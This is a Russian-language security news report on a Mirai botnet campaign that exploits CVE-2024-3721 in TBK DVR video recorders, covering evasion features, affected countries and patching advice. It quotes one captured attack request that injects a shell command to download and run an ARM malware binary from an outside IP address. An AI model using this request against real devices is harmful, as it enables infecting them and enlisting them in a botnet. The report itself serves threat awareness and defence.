Исследователи Kaspersky Lab обнаружили новую волну атак ботнета Mirai, эксплуатирующую уязвимость CVE-2024-3721 в DVR-устройствах TBK. Эти устройства, предназначенные для записи данных с камер видеонаблюдения, широко используются по всему миру и часто управляются удаленно, что делает их привлекательной мишенью для киберпреступников.
Описание
Атака начинается с отправки специального POST-запроса, содержащего команду для выполнения произвольного кода на уязвимом устройстве. Вредоносный скрипт загружает и запускает бинарный файл для архитектуры ARM32, после чего устройство становится частью ботнета. В отличие от традиционных атак Mirai, этот вариант пропускает этап разведки, так как нацелен исключительно на DVR-устройства с определенной архитектурой.
| 1 | "POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20arm7%3B%20wget%20http%3A%2F%2F42.112.26.36%2Farm7%3B%20chmod%20777%20%2A%3B%20.%2Farm7%20tbk HTTP/1.1" 200 1671 "-" "Mozila/5.0" |
Новая версия Mirai включает несколько усовершенствованных функций, таких как шифрование строк с помощью алгоритма RC4, а также методы противодействия анализу в виртуальных средах и эмуляторах. Бот проверяет наличие процессов, связанных с VMware или QEMU-arm, и анализирует директорию, в которой запущен, чтобы избежать обнаружения.
По данным исследователей, основными жертвами атак стали пользователи из Китая, Индии, Египта, Украины, России, Турции и Бразилии. В открытых источниках обнаружено более 50 000 уязвимых DVR-устройств, подключенных к интернету, что создает значительные риски для их владельцев.
Эксперты рекомендуют своевременно обновлять прошивки устройств и ограничивать доступ к ним из внешних сетей, чтобы минимизировать угрозу заражения. Уязвимость CVE-2024-3721 остается активным вектором атак, и ее эксплуатация может привести к масштабным кибератакам с использованием ботнета Mirai.